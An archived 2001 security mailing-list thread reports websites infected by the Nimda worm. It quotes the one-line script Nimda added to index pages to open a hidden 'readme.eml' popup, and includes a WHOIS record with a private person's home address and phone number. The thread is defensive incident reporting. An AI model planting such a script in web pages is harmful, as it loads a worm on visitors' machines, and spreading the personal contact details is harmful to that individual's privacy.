Security Incidents mailing list archives
RE: Web site infected by Nimda
From: "Ken Pfeil" <Ken () infosec101 org>
Date: Wed, 19 Sep 2001 13:44:31 -0400
I'm sure there's thousands of sites affected. No need to list em all here.
As an FYI, wininternals.com is NOT related to Winternals Software. It is
registered to:
Registrant:
Konstantinos Iatropoulos
3400 Ovila Hamel
St. Hubert, Quebec j3y 8p4
ca
Domain Name: WININTERNALS.COM
Administrative Contact:
Iatropoulos, Konstantinos costa.sylvia.iatropoulos () sympatico ca
3400 Ovila Hamel
St. Hubert, Quebec j3y 8p4
ca
450 4624930
Technical Contact:
Nameback, Hostmaster dns () nameback com
1001 N. Lake Destiny Road
Suite 125
Maitland, FL 32751
US
(407) 475-1130
Billing Contact:
Billing, Nameback billing () nameback com
1001 N. Lake Destiny Rd. Suite 125
Maitland, Florida 32751
US
407-475-1130
Record last updated on 18-Sep-2001.
Record expires on 14-Jun-2002.
Record Created on 14-Jun-2000.
Domain servers in listed order:
NS1.INFOBACK.NET 207.30.43.2
NS2.INFOBACK.COM 207.30.43.3
-----Original Message----- From: Jac Engel [mailto:jacengel () home nl] Sent: Wednesday, September 19, 2001 1:07 PM To: acz [iSecureLabs]; incidents () securityfocus com Subject: RE: Web site infected by Nimda http://www.wininternals.com is also infected by Nimda Virus, after the page is loaded I get a new page saying : You have encountered the following error while using Windows Media Player: ------------------------------------------------------------------ ---------- ---- Error# 8007000D Sorry, no more help is available for this problem at this time. Jac -----Original Message----- From: acz [iSecureLabs] [mailto:aurelien.cabezon () iSecureLabs com] Sent: Sunday, September 19, 1999 5:46 PM To: incidents () securityfocus com Subject: Web site infected by Nimda Hi all, http://www.digimind.fr/ is infected by Nimda virus ! This line was added at the end of the index.html ---<cut>--- <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> ---<cut>--- If you wanna visit digimind.fr, turn your webbrowser javascript off ! --- Cabezon Aurelien http://www.iSecureLabs.com ------------------------------------------------------------------ ---------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ------------------------------------------------------------------ ---------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Nimda - collected information Berislav Kucan (Sep 19)
- Web site infected by Nimda acz [iSecureLabs] (Sep 19)
- RE: Web site infected by Nimda Jac Engel (Sep 19)
- RE: Web site infected by Nimda Ken Pfeil (Sep 19)
- RE: Web site infected by Nimda John Q. Public (Sep 19)
- Re: MIME type of readme.eml (was Re: Web site infected by Nimda Rob Quinn (Sep 19)
- Re: MIME type of readme.eml (was Re: Web site infected by Nimda Nick FitzGerald (Sep 19)
- Re: MIME type of readme.eml (was Re: Web site infected by Nimda Rob Quinn (Sep 20)
- RE: Web site infected by Nimda Jac Engel (Sep 19)
- Web site infected by Nimda acz [iSecureLabs] (Sep 19)